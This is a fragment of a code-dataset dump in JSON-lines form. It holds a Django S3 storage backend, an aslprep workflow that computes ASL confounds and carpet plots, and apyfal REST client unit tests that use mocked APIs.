'/YYYY/MM/DD/.ext'\n ### encoded_name : //YYYY/MM/DD/.ext\n\n ##Save sync\n fs = FileSystemStorage()\n fs.save(cleaned_name, content)\n\n task = upload_task.apply_async(\n args=[\n self.bucket_name,\n encoded_name,\n cleaned_name,\n self.chunk_size,\n self.file_buffer_size,\n content_type,\n self.reduced_redundancy,\n self.encryption,\n self.headers,\n self.acl\n ]\n # Hack - right now this is called for any save (brand, audio, ...)\n #link=handle_post_upload.s()\n )\n #print(get_upload_task_status(task.id))\n\n return cleaned_name\n\n def delete(self, name):\n name = self._normalize_name(self._clean_name(name))\n self.bucket.delete_key(self._encode_name(name))\n\n def exists(self, name):\n name = self._normalize_name(self._clean_name(name))\n if self.entries:\n return name in self.entries\n k = self.bucket.new_key(self._encode_name(name))\n return k.exists()\n\n def listdir(self, name):\n name = self._normalize_name(self._clean_name(name))\n # for the bucket.list and logic below name needs to end in /\n # But for the root path \"\" we leave it as an empty string\n if name:\n name += '/'\n\n dirlist = self.bucket.list(self._encode_name(name))\n files = []\n dirs = set()\n base_parts = name.split(\"/\")[:-1]\n for item in dirlist:\n parts = item.name.split(\"/\")\n parts = parts[len(base_parts):]\n if len(parts) == 1:\n # File\n files.append(parts[0])\n elif len(parts) > 1:\n # Directory\n dirs.add(parts[0])\n return list(dirs), files\n\n def size(self, name):\n name = self._normalize_name(self._clean_name(name))\n\n # Accessing this property caches file by taking self.bucket.list()\n # and putting them in dict self._entries\n # Off by default\n if self.entries:\n entry = self.entries.get(name)\n if entry:\n return entry.size\n return 0\n # key.size – The size, in bytes, of the object.\n return self.bucket.get_key(self._encode_name(name)).size\n\n def modified_time(self, name):\n try:\n from dateutil import parser, tz\n except ImportError:\n raise NotImplementedError()\n name = self._normalize_name(self._clean_name(name))\n entry = self.entries.get(name)\n # only call self.bucket.get_key() if the key is not found\n # in the preloaded metadata.\n if entry is None:\n entry = self.bucket.get_key(self._encode_name(name))\n # 
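
# listdir() above fakes directories on top of flat S3 keys by splitting on
# '/' relative to the queried prefix. The same splitting logic over a plain
# list of key names (a sketch; real S3 listing filters by prefix server-side,
# so the keys here are assumed to already match it):
def split_listing(keys, prefix=''):
    if prefix and not prefix.endswith('/'):
        prefix += '/'
    base_parts = prefix.split('/')[:-1]
    files, dirs = [], set()
    for key in keys:
        parts = key.split('/')[len(base_parts):]
        if len(parts) == 1:    # key sits directly under the prefix -> file
            files.append(parts[0])
        elif len(parts) > 1:   # key nested deeper -> first part is a "dir"
            dirs.add(parts[0])
    return sorted(dirs), files

assert split_listing(['a/x.txt', 'a/b/y.txt', 'a/b/z.txt'], 'a') == (['b'], ['x.txt'])
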
convert to string to date\n last_modified_date = parser.parse(entry.last_modified)\n # if the date has no timzone, assume UTC\n if last_modified_date.tzinfo == None:\n last_modified_date = last_modified_date.replace(tzinfo=tz.tzutc())\n # convert date to local time w/o timezone\n timezone = tz.gettz(settings.TIME_ZONE)\n timezone.normalize(last_modified_date)\n return last_modified_date.astimezone(timezone).replace(tzinfo=None)\n\n def url(self, name):\n # _normalize calls safe_join that adds the 'location' tag\n # specified in our .config module\n cleaned_name = self._normalize_name(self._clean_name(name))\n\n fs = FileSystemStorage()\n local_exists = fs.exists(name)\n if local_exists:\n return os.path.join('/', cleaned_name)\n\n if self.custom_domain:\n return \"%s//%s/%s\" % (self.url_protocol, self.custom_domain, cleaned_name)\n\n return self.connection.generate_url(self.querystring_expire,\n method='GET', bucket=self.bucket.name, key=self._encode_name(cleaned_name),\n query_auth=self.querystring_auth, force_http=not self.secure_urls)\n\n def get_available_name(self, name):\n \"\"\" Overwrite existing file with the same name. \"\"\"\n if FILE_OVERWRITE:\n name = self._clean_name(name)\n return name\n return super(S3BotoStorage, self).get_available_name(name)\n\n\nclass S3BotoStorageFile(File):\n \"\"\"\n The default file object used by the S3BotoStorage backend.\n\n This file implements file streaming using boto's multipart\n uploading functionality. The file can be opened in read or\n write mode.\n\n This class extends Django's File class. However, the contained\n data is only the data contained in the current buffer. So you\n should not access the contained file object directly. You should\n access the data via this class.\n\n Warning: This file *must* be closed using the close() method in\n order to properly write the file to S3. Be sure to close the file\n in your application.\n \"\"\"\n # TODO: Read/Write (rw) mode may be a bit undefined at the moment. Needs testing.\n # TODO: When Django drops support for Python 2.5, rewrite to use the\n # BufferedIO streams in the Python 2.6 io module.\n\n def __init__(self, name, mode, storage, buffer_size=FILE_BUFFER_SIZE):\n\n self._storage = storage\n\n #Note that in config we can add prefixes\n self.name = name[len(self._storage.location):].lstrip('/')\n self._mode = mode\n self.key = storage.bucket.get_key(self._storage._encode_name(name))\n if not self.key and 'w' in mode:\n self.key = storage.bucket.new_key(storage._encode_name(name))\n\n self._is_dirty = False\n self._file = None\n self._multipart = None\n # 5 MB is the minimum part size (if there is more than one part).\n # Amazon allows up to 10,000 parts. The default supports uploads\n # up to roughly 50 GB. 
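
# modified_time() above parses the key's Last-Modified string and localises
# it. One caveat: `timezone.normalize(...)` is a pytz idiom, and dateutil tz
# objects have no normalize() method, so a dateutil-only version of the same
# conversion looks like this (a sketch; dateutil assumed available, as above):
from dateutil import parser, tz

def to_local_naive(last_modified, zone='UTC'):
    dt = parser.parse(last_modified)
    if dt.tzinfo is None:  # S3 timestamps are UTC when unqualified
        dt = dt.replace(tzinfo=tz.tzutc())
    return dt.astimezone(tz.gettz(zone)).replace(tzinfo=None)

print(to_local_naive('2015-06-01T12:00:00.000Z'))  # 2015-06-01 12:00:00
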
Increase the part size to accommodate\n # for files larger than this.\n self._write_buffer_size = buffer_size\n self._write_counter = 0\n\n @property\n def size(self):\n return self.key.size\n\n def _get_file(self):\n if self._file is None:\n\n # io.StringIO(initial_value='', newline='\\n')\n # An in-memory stream for text I/O.\n # StringIO can be used where a file was expected\n self._file = StringIO()\n if 'rb' == self._mode:\n self._file = BytesIO()\n if 'r' in self._mode:\n self._is_dirty = False\n self.key.get_contents_to_file(self._file)\n self._file.seek(0)\n if self._storage.gzip and self.key.content_encoding == 'gzip':\n self._file = GzipFile(mode=self._mode, fileobj=self._file)\n return self._file\n\n def _set_file(self, value):\n self._file = value\n\n file = property(_get_file, _set_file)\n\n def read(self, *args, **kwargs):\n if 'r' not in self._mode:\n raise AttributeError(\"File was not opened in read mode.\")\n return super(S3BotoStorageFile, self).read(*args, **kwargs)\n\n def write(self, *args, **kwargs):\n if 'w' not in self._mode:\n raise AttributeError(\"File was not opened in write mode.\")\n self._is_dirty = True\n if self._multipart is None:\n provider = self.key.bucket.connection.provider\n upload_headers = {\n provider.acl_header: self._storage.acl\n }\n upload_headers.update(self._storage.headers)\n self._multipart = self._storage.bucket.initiate_multipart_upload(\n self.key.name,\n headers=upload_headers,\n reduced_redundancy=self._storage.reduced_redundancy\n )\n if self._write_buffer_size <= self._buffer_file_size:\n self._flush_write_buffer()\n return super(S3BotoStorageFile, self).write(*args, **kwargs)\n\n @property\n def _buffer_file_size(self):\n pos = self.file.tell()\n self.file.seek(0, os.SEEK_END)\n length = self.file.tell()\n self.file.seek(pos)\n return length\n\n def _flush_write_buffer(self):\n \"\"\"\n Flushes the write buffer.\n \"\"\"\n if self._buffer_file_size:\n self._write_counter += 1\n self.file.seek(0)\n self._multipart.upload_part_from_file(\n self.file,\n self._write_counter,\n headers=self._storage.headers\n )\n self.file.close()\n self._file = None\n\n def close(self):\n if self._is_dirty:\n self._flush_write_buffer()\n self._multipart.complete_upload()\n else:\n if not self._multipart is None:\n self._multipart.cancel_upload()\n self.key.close()\n","sub_path":"s3Manager/s3boto.py","file_name":"s3boto.py","file_ext":"py","file_size_in_byte":21804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"199245205","text":"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nCalculate asl confounds\n^^^^^^^^^^^^^^^^^^^^^^^^\n\n.. 
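
# write()/_flush_write_buffer() above implement multipart upload by buffering
# locally and shipping one numbered part per flush. The buffering discipline
# in isolation (a storage-free sketch; send_part stands in for
# upload_part_from_file, and real S3 requires parts of at least 5 MB):
import io

class PartBuffer:
    def __init__(self, part_size, send_part):
        self.part_size = part_size
        self.send_part = send_part  # callback(part_number, data)
        self.buf = io.BytesIO()
        self.part_number = 0

    def write(self, data):
        self.buf.write(data)
        if self.buf.tell() >= self.part_size:
            self.flush()

    def flush(self):
        if self.buf.tell():
            self.part_number += 1
            self.send_part(self.part_number, self.buf.getvalue())
            self.buf = io.BytesIO()  # fresh buffer, like `self._file = None` above

parts = []
pb = PartBuffer(4, lambda n, b: parts.append((n, b)))
pb.write(b'abcdef')
pb.flush()
assert parts == [(1, b'abcdef')]
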
autofunction:: init_asl_confs_wf\n\n\n\"\"\"\nfrom os import getenv\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu, fsl\nfrom nipype.algorithms import confounds as nac\n\nfrom templateflow.api import get as get_template\nfrom ...niworkflows.engine.workflows import LiterateWorkflow as Workflow\nfrom ...niworkflows.interfaces.confounds import ExpandModel, SpikeRegressors\nfrom ...niworkflows.interfaces.fixes import FixHeaderApplyTransforms as ApplyTransforms\nfrom ...niworkflows.interfaces.images import SignalExtraction\nfrom ...niworkflows.interfaces.masks import ROIsPlot\nfrom ...niworkflows.interfaces.utility import KeySelect\nfrom ...niworkflows.interfaces.patches import (\n RobustACompCor as ACompCor,\n RobustTCompCor as TCompCor,\n)\nfrom ...niworkflows.interfaces.plotting import (\n CompCorVariancePlot, ConfoundsCorrelationPlot\n)\nfrom ...niworkflows.interfaces.segmentation import ICA_AROMARPT\nfrom ...niworkflows.interfaces.utils import (\n TPM2ROI, AddTPMs, AddTSVHeader, TSV2JSON, DictMerge\n)\n\nfrom ...config import DEFAULT_MEMORY_MIN_GB\nfrom ...interfaces import (\n GatherConfounds, \n ASLSummary, DerivativesDataSink\n)\n\n\ndef init_asl_confs_wf(\n mem_gb,\n metadata,\n name=\"asl_confs_wf\",\n):\n \"\"\"\n Build a workflow to generate and write out confounding signals.\n\n This workflow calculates confounds for a asl series, and aggregates them\n into a :abbr:`TSV (tab-separated value)` file, for use as nuisance\n regressors in a :abbr:`GLM (general linear model)`.\n The following confounds are calculated, with column headings in parentheses:\n\n #. DVARS - original and standardized variants (``dvars``, ``std_dvars``)\n #. Framewise displacement, based on head-motion parameters\n (``framewise_displacement``)\n #. Estimated head-motion parameters, in mm and rad\n (``trans_x``, ``trans_y``, ``trans_z``, ``rot_x``, ``rot_y``, ``rot_z``)\n\n Workflow Graph\n .. workflow::\n :graph2use: orig\n :simple_form: yes\n\n from aslprep.workflows.asl.confounds import init_asl_confs_wf\n wf = init_asl_confs_wf(\n mem_gb=1,\n metadata={},\n )\n\n Parameters\n ----------\n mem_gb : :obj:`float`\n Size of asl file in GB - please note that this size\n should be calculated after resamplings that may extend\n the FoV\n metadata : :obj:`dict`\n BIDS metadata for asl file\n name : :obj:`str`\n Name of workflow (default: ``asl_confs_wf``)\n\n\n Inputs\n ------\n asl\n asl image, after the prescribed corrections (STC, HMC and SDC)\n when available.\n asl_mask\n asl series mask\n movpar_file\n SPM-formatted motion parameters file\n skip_vols\n number of non steady state volumes\n t1w_mask\n Mask of the skull-stripped template image\n t1w_tpms\n List of tissue probability maps in T1w space\n t1_asl_xform\n Affine matrix that maps the T1w space into alignment with\n the native asl space\n\n Outputs\n -------\n confounds_file\n TSV of all aggregated confounds\n confounds_metadata\n Confounds metadata dictionary.\n\n \"\"\"\n workflow = Workflow(name=name)\n workflow.__desc__ = \"\"\"\\\nSeveral confounding time-series were calculated based on the\n*preprocessed ASL*: framewise displacement (FD) and DVARS. 
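
# FD and DVARS, referenced in the workflow description above, reduce to a few
# lines of NumPy. A sketch of the standard Power et al. definitions (motion
# columns assumed ordered [tx, ty, tz, rx, ry, rz] with rotations in radians,
# and a 50 mm head radius, which matches nipype's defaults):
import numpy as np

def framewise_displacement(motion, radius=50.0):
    diffs = np.abs(np.diff(motion, axis=0))
    diffs[:, 3:] *= radius          # rotations (rad) -> arc length (mm)
    return diffs.sum(axis=1)        # one FD value per volume transition

def dvars(data2d):
    # data2d: voxels x timepoints; RMS of the temporal difference per frame
    return np.sqrt(np.mean(np.diff(data2d, axis=1) ** 2, axis=0))

motion = np.zeros((3, 6))
motion[1, 0] = 1.0                  # a 1 mm jump along x at the second frame
print(framewise_displacement(motion))  # [1. 1.]
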
\nFD and DVARS are calculated for each ASL run, both using their\nimplementations in *Nipype* [following the definitions by @power_fd_dvars].\nThe head-motion estimates calculated in the correction step were also\nplaced within the corresponding confounds file.\n\n\"\"\"\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['asl', 'asl_mask', 'movpar_file', 'skip_vols',\n 't1w_mask', 't1w_tpms', 't1_asl_xform']),\n name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['confounds_file', 'confounds_metadata']),\n name='outputnode')\n\n # DVARS\n dvars = pe.Node(nac.ComputeDVARS(save_nstd=True, save_std=True, remove_zerovariance=True),\n name=\"dvars\", mem_gb=mem_gb)\n\n # Frame displacement\n fdisp = pe.Node(nac.FramewiseDisplacement(parameter_source=\"SPM\"),\n name=\"fdisp\", mem_gb=mem_gb)\n\n\n # Global and segment regressors\n #signals_class_labels = [\"csf\", \"white_matter\", \"global_signal\"]\n\n # Arrange confounds\n add_dvars_header = pe.Node(\n AddTSVHeader(columns=[\"dvars\"]),\n name=\"add_dvars_header\", mem_gb=0.01, run_without_submitting=True)\n add_std_dvars_header = pe.Node(\n AddTSVHeader(columns=[\"std_dvars\"]),\n name=\"add_std_dvars_header\", mem_gb=0.01, run_without_submitting=True)\n add_motion_headers = pe.Node(\n AddTSVHeader(columns=[\"trans_x\", \"trans_y\", \"trans_z\", \"rot_x\", \"rot_y\", \"rot_z\"]),\n name=\"add_motion_headers\", mem_gb=0.01, run_without_submitting=True)\n concat = pe.Node(GatherConfounds(), name=\"concat\", mem_gb=0.01, run_without_submitting=True)\n\n\n\n # Expand model to include derivatives and quadratics\n\n workflow.connect([\n # connect inputnode to each non-anatomical confound node\n (inputnode, dvars, [('asl', 'in_file'),\n ('asl_mask', 'in_mask')]),\n (inputnode, fdisp, [('movpar_file', 'in_file')]),\n # Collate computed confounds together\n (inputnode, add_motion_headers, [('movpar_file', 'in_file')]),\n (dvars, add_dvars_header, [('out_nstd', 'in_file')]),\n (dvars, add_std_dvars_header, [('out_std', 'in_file')]),\n (fdisp, concat, [('out_file', 'fd')]),\n (add_motion_headers, concat, [('out_file', 'motion')]),\n (add_dvars_header, concat, [('out_file', 'dvars')]),\n (add_std_dvars_header, concat, [('out_file', 'std_dvars')]),\n\n # Expand the model with derivatives, quadratics, and spikes\n\n # Set outputs\n (concat, outputnode, [('confounds_file', 'confounds_file')]),\n \n ])\n\n return workflow\n\n\ndef init_carpetplot_wf(mem_gb, metadata, name=\"asl_carpet_wf\"):\n \"\"\"\n Build a workflow to generate *carpet* plots.\n\n Resamples the MNI parcellation (ad-hoc parcellation derived from the\n Harvard-Oxford template and others).\n\n Parameters\n ----------\n mem_gb : :obj:`float`\n Size of ASL file in GB - please note that this size\n should be calculated after resamplings that may extend\n the FoV\n metadata : :obj:`dict`\n BIDS metadata for ASL file\n name : :obj:`str`\n Name of workflow (default: ``asl_carpet_wf``)\n\n Inputs\n ------\n asl\n asl image, after the prescribed corrections (STC, HMC and SDC)\n when available.\n asl_mask\n ASL series mask\n confounds_file\n TSV of all aggregated confounds\n t1_asl_xform\n Affine matrix that maps the T1w space into alignment with\n the native ASL space\n std2anat_xfm\n ANTs-compatible affine-and-warp transform file\n\n Outputs\n -------\n out_carpetplot\n Path of the generated SVG file\n\n \"\"\"\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['asl', 'asl_mask', 'confounds_file',\n 't1_asl_xform', 'std2anat_xfm']),\n name='inputnode')\n\n outputnode 
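
# GatherConfounds above merges the individual headed TSVs into the single
# confounds file. Conceptually it is a column-wise concat (a pandas sketch,
# not the actual aslprep interface; the column names follow the headers added
# by the AddTSVHeader nodes above):
import pandas as pd

fd = pd.DataFrame({'framewise_displacement': [0.0, 0.10, 0.05]})
dv = pd.DataFrame({'std_dvars': [1.1, 1.0, 1.2]})
motion = pd.DataFrame({'trans_x': [0.00, 0.01, 0.02]})

confounds = pd.concat([fd, dv, motion], axis=1)
confounds.to_csv('confounds.tsv', sep='\t', index=False, na_rep='n/a')
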
= pe.Node(niu.IdentityInterface(\n fields=['out_carpetplot']), name='outputnode')\n\n # List transforms\n mrg_xfms = pe.Node(niu.Merge(2), name='mrg_xfms')\n\n # Warp segmentation into EPI space\n resample_parc = pe.Node(ApplyTransforms(\n float=True,\n input_image=str(get_template(\n 'MNI152NLin2009cAsym', resolution=1, desc='carpet',\n suffix='dseg', extension=['.nii', '.nii.gz'])),\n dimension=3, default_value=0, interpolation='MultiLabel'),\n name='resample_parc')\n\n # Carpetplot and confounds plot\n conf_plot = pe.Node(ASLSummary(\n tr=metadata['RepetitionTime'],\n confounds_list=[\n ('std_dvars', None, 'DVARS'),\n ('framewise_displacement', 'mm', 'FD')]),\n name='conf_plot', mem_gb=mem_gb)\n ds_report_asl_conf = pe.Node(\n DerivativesDataSink(desc='carpetplot',datatype=\"figures\", \n keep_dtype=True),\n name='ds_report_asl_conf', run_without_submitting=True,\n mem_gb=DEFAULT_MEMORY_MIN_GB)\n\n workflow = Workflow(name=name)\n workflow.connect([\n (inputnode, mrg_xfms, [('t1_asl_xform', 'in1'),\n ('std2anat_xfm', 'in2')]),\n (inputnode, resample_parc, [('asl_mask', 'reference_image')]),\n (mrg_xfms, resample_parc, [('out', 'transforms')]),\n # Carpetplot\n (inputnode, conf_plot, [\n ('asl', 'in_func'),\n ('asl_mask', 'in_mask'),\n ('confounds_file', 'confounds_file')]),\n (resample_parc, conf_plot, [('output_image', 'in_segm')]),\n (conf_plot, ds_report_asl_conf, [('out_file', 'in_file')]),\n (conf_plot, outputnode, [('out_file', 'out_carpetplot')]),\n ])\n return workflow\n\n\ndef _remove_volumes(asl_file, skip_vols):\n \"\"\"Remove skip_vols from asl_file.\"\"\"\n import nibabel as nb\n from nipype.utils.filemanip import fname_presuffix\n\n if skip_vols == 0:\n return asl_file\n\n out = fname_presuffix(asl_file, suffix='_cut')\n asl_img = nb.load(asl_file)\n asl_img.__class__(asl_img.dataobj[..., skip_vols:],\n asl_img.affine, asl_img.header).to_filename(out)\n\n return out\n\n\ndef _add_volumes(asl_file, asl_cut_file, skip_vols):\n \"\"\"Prepend skip_vols from asl_file onto asl_cut_file.\"\"\"\n import nibabel as nb\n import numpy as np\n from nipype.utils.filemanip import fname_presuffix\n\n if skip_vols == 0:\n return asl_cut_file\n\n asl_img = nb.load(asl_file)\n asl_cut_img = nb.load(asl_cut_file)\n\n asl_data = np.concatenate((asl_img.dataobj[..., :skip_vols],\n asl_cut_img.dataobj), axis=3)\n\n out = fname_presuffix(asl_cut_file, suffix='_addnonsteady')\n asl_img.__class__(asl_data, asl_img.affine, asl_img.header).to_filename(out)\n\n return out\n\n\ndef _maskroi(in_mask, roi_file):\n import numpy as np\n import nibabel as nb\n from nipype.utils.filemanip import fname_presuffix\n\n roi = nb.load(roi_file)\n roidata = roi.get_data().astype(np.uint8)\n msk = nb.load(in_mask).get_data().astype(bool)\n roidata[~msk] = 0\n roi.set_data_dtype(np.uint8)\n\n out = fname_presuffix(roi_file, suffix='_aslmsk')\n roi.__class__(roidata, roi.affine, roi.header).to_filename(out)\n return out","sub_path":"aslprep/workflows/asl/confounds.py","file_name":"confounds.py","file_ext":"py","file_size_in_byte":10732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144386831","text":"# coding=utf-8\n\"\"\"apyfal.client.rest tests\"\"\"\nimport collections\nfrom contextlib import contextmanager\nimport copy\nimport io\nimport gc\nimport json\nimport sys\n\nimport pytest\nimport requests\n\n\ndef test_restclient_is_alive():\n \"\"\"Tests RESTClient.is_alive\"\"\"\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import 
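
# _remove_volumes()/_add_volumes() above are inverses: one drops the first
# skip_vols non-steady-state frames, the other pastes them back. A round-trip
# check with a synthetic image (nibabel assumed, as in the helpers above):
import nibabel as nb
import numpy as np

img = nb.Nifti1Image(np.zeros((2, 2, 2, 10), dtype='f4'), np.eye(4))
cut = img.__class__(img.dataobj[..., 3:], img.affine, img.header)        # remove
restored = img.__class__(
    np.concatenate((img.dataobj[..., :3], cut.dataobj), axis=3),         # add back
    img.affine, img.header)
assert restored.shape == img.shape
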
ClientRuntimeException\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def __init__(self, host_ip=None):\n \"\"\"Do not initialize\"\"\"\n self._url = host_ip\n\n def __del__(self):\n \"\"\"Do nothing\"\"\"\n\n # Test: No host\n client = DummyAccelerator()\n with pytest.raises(ClientRuntimeException):\n client._is_alive()\n\n # Test: URL exists\n client = DummyAccelerator(\n host_ip='https://www.accelize.com')\n client._is_alive()\n\n # Test: URL not exist\n client = DummyAccelerator(\n host_ip='https://www.url_that_not_exists.accelize.com')\n with pytest.raises(ClientRuntimeException):\n client._is_alive()\n\n\ndef test_restclient_url():\n \"\"\"Tests RESTClient.url\"\"\"\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientConfigurationException\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n use_last_configuration_called = False\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n def _use_last_configuration(self):\n \"\"\"Checks if called\"\"\"\n self.use_last_configuration_called = True\n\n accelerator = DummyAccelerator('Dummy')\n\n # Test: No accelerator provided\n with pytest.raises(ClientConfigurationException):\n DummyAccelerator()\n\n # Test: No URL provided\n with pytest.raises(ClientConfigurationException):\n accelerator.url = None\n\n with pytest.raises(ClientConfigurationException):\n accelerator.url = ''\n\n # Test: Invalid URL provided\n # Not for test all bad URL cases, only that check_url\n # function is properly called\n with pytest.raises(ValueError):\n accelerator.url = 'http://url_not_valid'\n\n # Test: Valid URL\n ip_address = '127.0.0.1'\n url = 'http://%s' % ip_address\n accelerator.url = url\n assert accelerator._url == url\n assert accelerator._api_client.configuration.host == url\n assert accelerator.use_last_configuration_called\n\n # Test: URL set with IP\n accelerator.url = ip_address\n assert accelerator._url == url\n\n\ndef test_restclient_start():\n \"\"\"Tests RESTClient.start\"\"\"\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientRuntimeException\n import apyfal.client.rest._openapi as rest_api\n\n # Mock OpenApi REST API ConfigurationApi\n excepted_parameters = None\n excepted_datafile = None\n configuration_read_in_error = 0\n\n base_parameters_result = {\n 'app': {'status': 0, 'msg': 'dummy_msg'}}\n\n class ConfigurationApi:\n \"\"\"Fake rest_api.ConfigurationApi\"\"\"\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @staticmethod\n def configuration_create(parameters, datafile):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n\n # Check parameters\n if excepted_parameters is not None:\n assert json.loads(parameters) == excepted_parameters\n if excepted_datafile is not None:\n assert datafile == excepted_datafile\n\n # Return response\n Response = collections.namedtuple(\n 'Response', ['url', 'id', 'parametersresult'])\n\n return Response(\n url='dummy_url', id='dummy_id',\n parametersresult=json.dumps(base_parameters_result))\n\n @staticmethod\n def configuration_read(id_value):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n Response = collections.namedtuple('Response', ['inerror', 'id', 'url'])\n\n # Check parameters\n assert id_value == 'dummy_id'\n\n # Return response\n return Response(url='dummy_url', id=id_value, inerror=configuration_read_in_error)\n\n # Mock some 
accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n @staticmethod\n @contextmanager\n def _data_file(url, *_, **__):\n \"\"\"Skip file presence check\"\"\"\n yield url\n\n @property\n def url(self):\n \"\"\"Fake URL\"\"\"\n return 'dummy_accelerator_url'\n\n client_id = 'dummy_client_id'\n secret_id = 'dummy_secret_id'\n\n accelerator = DummyAccelerator(\n 'Dummy', accelize_client_id=client_id,\n accelize_secret_id=secret_id)\n\n base_parameters = {\n \"env\": {\n \"client_id\": client_id,\n \"client_secret\": secret_id}}\n\n base_response = {'url_config': 'dummy_url',\n 'url_instance': accelerator.url}\n\n # Monkey patch OpenAPI client with mocked API\n rest_api_configuration_api = rest_api.ConfigurationApi\n rest_api.ConfigurationApi = ConfigurationApi\n\n # Tests\n try:\n # Check with arguments\n accelerator_parameters = {'dummy_param': None}\n excepted_parameters = base_parameters.copy()\n excepted_parameters.update(accelerator._configuration_parameters)\n excepted_parameters['app']['specific'] = accelerator_parameters\n excepted_datafile = 'dummy_datafile'\n excepted_response = base_response.copy()\n excepted_response.update(base_parameters_result)\n\n assert excepted_response == accelerator.start(\n datafile=excepted_datafile, info_dict=True,\n **accelerator_parameters)\n\n # Check default values\n excepted_datafile = ''\n excepted_parameters = base_parameters.copy()\n excepted_parameters.update(accelerator._configuration_parameters)\n excepted_response = base_response.copy()\n excepted_response.update(base_parameters_result)\n\n # On already configured\n assert accelerator.start(info_dict=True) is None\n\n # On not configured\n accelerator._configuration_url = None\n assert accelerator.start(info_dict=True) == excepted_response\n\n # Check error from host\n configuration_read_in_error = 1\n accelerator._configuration_url = None\n with pytest.raises(ClientRuntimeException):\n accelerator.start()\n\n # Restore OpenApi client API\n finally:\n rest_api.ConfigurationApi = rest_api_configuration_api\n\n\ndef test_restclient_use_last_configuration():\n \"\"\"Tests RESTClient._use_last_configuration\"\"\"\n from apyfal.client.rest import RESTClient\n import apyfal.client.rest._openapi as rest_api\n\n # Mock OpenApi REST API ConfigurationApi\n Config = collections.namedtuple('Config', ['url', 'used'])\n config_list = []\n configuration_list_raises = False\n\n class ConfigurationApi:\n \"\"\"Fake rest_api.ConfigurationApi\"\"\"\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @staticmethod\n def configuration_list():\n \"\"\"Returns fake response\"\"\"\n if configuration_list_raises:\n raise ValueError\n Response = collections.namedtuple('Response', ['results'])\n return Response(results=config_list)\n\n # Monkey patch OpenApi client with mocked API\n rest_api_configuration_api = rest_api.ConfigurationApi\n rest_api.ConfigurationApi = ConfigurationApi\n\n # Tests:\n # method called through AcceleratorClient.url, through AcceleratorClient.__init__\n try:\n\n # No previous configuration\n accelerator = RESTClient(\n 'Dummy', host_ip='https://www.accelize.com')\n assert accelerator._configuration_url is None\n\n configuration_list_raises = True\n accelerator = RESTClient(\n 'Dummy', host_ip='https://www.accelize.com')\n assert accelerator._configuration_url is None\n configuration_list_raises = False\n\n # Unused previous configuration\n 
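
# Every test in this module swaps a module attribute for a fake and restores
# it in a finally block, so one failing test cannot leak its fake into the
# next test. The bare pattern, with hypothetical names standing in for
# rest_api and its API classes:
import types

fake_rest_api = types.SimpleNamespace(ConfigurationApi=object)

class FakeConfigurationApi(object):
    pass

original = fake_rest_api.ConfigurationApi
fake_rest_api.ConfigurationApi = FakeConfigurationApi
try:
    assert fake_rest_api.ConfigurationApi is FakeConfigurationApi  # test body
finally:
    fake_rest_api.ConfigurationApi = original  # always restored

assert fake_rest_api.ConfigurationApi is original
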
config_list.append(Config(url='dummy_config_url', used=0))\n accelerator = RESTClient(\n 'Dummy', host_ip='https://www.accelize.com')\n assert accelerator._configuration_url is None\n\n # Used previous configuration\n config_list.insert(0, Config(url='dummy_config_url_2', used=1))\n accelerator = RESTClient(\n 'Dummy', host_ip='https://www.accelize.com')\n assert accelerator._configuration_url == 'dummy_config_url_2'\n\n # Restore OpenApi client API\n finally:\n rest_api.ConfigurationApi = rest_api_configuration_api\n\n\ndef test_restclient_stop():\n \"\"\"Tests RESTClient.stop\"\"\"\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientRuntimeException\n import apyfal.client.rest._openapi as rest_api\n\n # Mock OpenApi REST API StopApi\n is_alive = True\n stop_list = {'app': {'status': 0, 'msg': ''}}\n stop_list_raise = None\n\n class StopApi:\n \"\"\"Fake rest_api.StopApi\"\"\"\n is_running = True\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @classmethod\n def stop_list(cls):\n \"\"\"Simulates accelerator stop and returns fake response\"\"\"\n # Stop AcceleratorClient\n cls.is_running = False\n\n # Fake error\n if stop_list_raise:\n raise rest_api.rest.ApiException\n\n # Return result\n return stop_list\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def _is_alive(self):\n \"\"\"Raise on demand\"\"\"\n if not is_alive:\n raise ClientRuntimeException()\n\n # Monkey patch OpenApi client with mocked API\n rest_api_stop_api = rest_api.StopApi\n rest_api.StopApi = StopApi\n\n # Tests\n try:\n # AcceleratorClient to stop\n accelerator = DummyAccelerator('Dummy')\n assert accelerator.stop(info_dict=True) == stop_list\n assert not StopApi.is_running\n\n # Ignore OpenApi exceptions\n stop_list_raise = True\n assert DummyAccelerator('Dummy').stop(\n info_dict=True) is None\n assert not StopApi.is_running\n stop_list_raise = False\n\n # Auto-stops with context manager\n StopApi.is_running = True\n with DummyAccelerator('Dummy') as accelerator:\n # Checks __enter__ returned object\n assert isinstance(accelerator, RESTClient)\n assert not StopApi.is_running\n\n # Auto-stops on garbage collection\n StopApi.is_running = True\n DummyAccelerator('Dummy')\n gc.collect()\n assert not StopApi.is_running\n\n # No accelerator to stop\n is_alive = False\n assert DummyAccelerator('Dummy').stop(\n info_dict=True) is None\n\n # Restore OpenApi client API\n 